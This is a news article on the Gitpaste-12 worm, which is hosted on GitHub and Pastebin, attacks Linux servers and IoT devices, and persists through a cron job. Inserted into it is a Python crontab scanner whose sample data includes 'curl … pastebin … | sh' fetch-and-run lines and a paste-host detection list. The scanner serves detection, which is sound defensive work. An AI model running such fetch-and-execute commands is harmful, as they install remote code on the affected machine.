Gitpaste-12 malware is targeting you through GitHub

by Loredana Harsana
Editor

  • Linux-based x86 servers and Linux ARM/MIPS-based IoT devices may become Gitpaste-12 targets.
  • Gitpaste-12 is a new worm that uses GitHub and Pastebin. Take a look below to find more about it.

Gitpaste-12 is a recently discovered worm that uses GitHub and Pastebin to house its component code and exploits over 12 vulnerabilities.

It is known as Gitpaste-12 because it uses GitHub and Pastebin and has at least 12 different attack modules.

At the moment, targets include Linux-based x86 servers, along with Linux ARM- and MIPS-based IoT devices.

The first Gitpaste-12 attacks were detected by Juniper Threat Labs. The report released by Juniper Threat Labs reveals:

The first phase of the attack is the initial system compromise. (…) This worm has 12 known attack modules and more under development. 

How does Gitpaste-12 spread?


After this initial phase, the worm seems to have a precise mission: it identifies known exploits and may attempt to brute force passwords.

When a system is compromised, Gitpaste-12 sets up a cron job it downloads from Pastebin, which executes the same script again each minute.

This efficient mechanism is most likely used to push cron job updates to the botnet. As already confirmed, the Gitpaste-12 malware also contains a script that launches attacks against other machines.
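An added example (not from the article or from Juniper's report): a small Python check that scans crontab text for the persistence pattern described above, an entry that runs every minute and fetches from Pastebin or GitHub. The host list, the curl/wget heuristic and the sample crontab are assumptions constructed for illustration.

```python
import re

# Assumed watch list: the hosting services the article names, plus GitHub's raw host.
PASTE_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com")
FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")  # assumed download heuristic
EVERY_MINUTE = {"*", "*/1"}                   # minute fields that fire each minute

def parse_cron_line(line, has_user_field=False):
    """Return (schedule_fields, command), or None for comments, blanks, env lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
        return None  # environment assignment such as MAILTO=root
    n = 6 if has_user_field else 5  # /etc/crontab and /etc/cron.d add a user column
    parts = line.split(None, n)
    if len(parts) <= n:
        return None  # @reboot-style or malformed entries are out of scope here
    return parts[:5], parts[n]

def suspicious_entries(crontab_text, has_user_field=False):
    """List (line_number, host, command) for every-minute jobs that fetch from a paste host."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        parsed = parse_cron_line(raw, has_user_field)
        if parsed is None:
            continue
        fields, command = parsed
        every_minute = fields[0] in EVERY_MINUTE and all(f == "*" for f in fields[1:])
        host = next((h for h in PASTE_HOSTS if h in command.lower()), None)
        if every_minute and host and FETCH_TOOLS.search(command):
            findings.append((lineno, host, command))
    return findings

# Constructed sample crontab; EXAMPLEID is a placeholder, not a real paste.
SAMPLE_CRONTAB = """\
# constructed sample, not taken from a real infection
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | sh
*/5 * * * * wget -qO- https://pastebin.com/raw/EXAMPLEID | sh
* * * * * /usr/bin/flock -n /tmp/app.lock /opt/app/heartbeat
"""

if __name__ == "__main__":
    for lineno, host, command in suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: every-minute fetch from {host}: {command}")
```

Feed it the output of `crontab -l` per user, and pass `has_user_field=True` for `/etc/crontab` and files under `/etc/cron.d`.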

This is how the worm tries to replicate: it starts by picking a random /8 CIDR block and attacking all addresses within that range.

Knowing the Gitpaste-12 location and the fact that it can spread that easily, are you about to keep on using GitHub? Let us know your thoughts on this in the comments area below.